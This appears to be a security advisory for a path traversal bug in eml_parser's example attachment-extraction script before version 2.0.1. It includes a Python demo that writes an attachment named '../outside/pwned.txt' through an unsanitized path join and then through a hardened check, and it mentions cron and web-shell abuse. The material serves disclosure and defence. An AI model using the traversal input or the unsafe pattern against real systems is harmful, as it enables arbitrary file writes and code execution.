eml_parser Path Traversal Vulnerability in Official Example Script Allowing Arbitrary File Write
Vulnerability
A path traversal vulnerability has been identified in the official example script 'examples/recursively_extract_attachments.py' shipped with the eml_parser Python module, prior to version 2.0.1. The script joins each attachment filename taken from the parsed message directly onto the output directory path without sanitizing it, so a filename containing '../' sequences escapes the intended output directory and the attachment is written to an attacker-chosen location. Note that the flaw is in the example script, not in the parsing library itself; it is triggered when the script is run against an attacker-supplied .eml file. The vulnerability has been patched in version 2.0.1.
Impact
Exploitation of this vulnerability allows arbitrary file writes outside the intended output directory, with the attachment contents fully under the attacker's control. The severity depends on where the file can be written and on the permissions of the user running the script. For example, an attacker could drop a file into a cron directory to obtain scheduled code execution, or write a web shell into a web server's document root.
Reproduction
To reproduce this vulnerability, create a malicious .eml file whose attachment has a filename containing path traversal sequences, such as '../outside/pwned.txt'. Then run the 'recursively_extract_attachments.py' example script against that file, pointing it at an output directory of your choice. The script writes the attachment outside that directory (here into a sibling 'outside' directory), demonstrating the path traversal.
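The following is an added, self-contained example and is not code from the eml_parser project or its example script. It uses only the standard library: it constructs a malicious .eml in memory, extracts the attachment the unsafe way (unsanitized `os.path.join`, which mirrors the pattern described above), then extracts it again with a hardened target-path check. The helper names (`build_malicious_eml`, `extract_unsafe`, `extract_safe`, `safe_target`, `escapes`, `run_demo`) and the sample message are assumptions made for this demonstration.

```python
import os
import tempfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Constructed attachment name carrying a traversal sequence (not from the advisory's PoC).
TRAVERSAL_NAME = "../outside/pwned.txt"


def build_malicious_eml() -> bytes:
    """Build a constructed .eml whose single attachment has a traversal filename."""
    msg = EmailMessage()
    msg["From"] = "attacker@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "invoice"
    msg.set_content("see attached")
    msg.add_attachment(b"pwned\n", maintype="application",
                       subtype="octet-stream", filename=TRAVERSAL_NAME)
    return msg.as_bytes()


def _attachments(raw: bytes):
    """Yield (filename, bytes) for every attachment, as parsed by the stdlib."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    for part in msg.iter_attachments():
        yield part.get_filename(), part.get_payload(decode=True)


def extract_unsafe(raw: bytes, outdir: str) -> list:
    """Vulnerable pattern: the untrusted filename is joined straight onto outdir."""
    written = []
    for name, data in _attachments(raw):
        path = os.path.join(outdir, name)          # '../' walks out of outdir
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
        written.append(path)
    return written


def safe_target(outdir: str, name: str) -> str:
    """Hardened: drop any directory component, then prove the result stays under outdir."""
    base = os.path.basename(name.replace("\\", "/"))   # strip both separator styles
    if base in ("", ".", ".."):
        base = "attachment.bin"                       # assumed fallback name
    root = os.path.realpath(outdir)
    target = os.path.realpath(os.path.join(root, base))
    # Defence in depth: even after basename(), refuse anything resolving outside root.
    if os.path.commonpath([root, target]) != root:
        raise ValueError(f"refusing to write outside {root}: {name!r}")
    return target


def extract_safe(raw: bytes, outdir: str) -> list:
    """Same extraction loop, but every path goes through safe_target()."""
    written = []
    for name, data in _attachments(raw):
        path = safe_target(outdir, name)
        with open(path, "wb") as fh:
            fh.write(data)
        written.append(path)
    return written


def escapes(outdir: str, path: str) -> bool:
    """True if path resolves outside outdir (symlink-aware via realpath)."""
    root = os.path.realpath(outdir)
    return os.path.commonpath([root, os.path.realpath(path)]) != root


def run_demo() -> dict:
    """Run both extractors in a scratch directory and report where the file landed."""
    raw = build_malicious_eml()
    with tempfile.TemporaryDirectory() as tmp:
        outdir = os.path.join(tmp, "out")
        os.makedirs(outdir)
        unsafe = extract_unsafe(raw, outdir)
        safe = extract_safe(raw, outdir)
        return {
            "unsafe_escaped": escapes(outdir, unsafe[0]),
            "landed_in_sibling_dir": os.path.isfile(
                os.path.join(tmp, "outside", "pwned.txt")),
            "safe_escaped": escapes(outdir, safe[0]),
            "safe_name": os.path.basename(safe[0]),
        }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The unsafe extractor lands the file in a sibling 'outside' directory next to the chosen output directory, which is exactly the behaviour the reproduction above describes. The hardened version relies on two independent controls: `basename()` removes the attacker's directory components, and the `realpath`/`commonpath` comparison rejects any result that still resolves outside the root, which also covers symlinked output directories.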
Remediation
Users should update to eml_parser version 2.0.1 or later, where the example script has been fixed. Any code that copied the original example's extraction loop should likewise sanitize attachment filenames (for example by keeping only the base name and verifying the resolved path stays inside the output directory) before writing to disk.
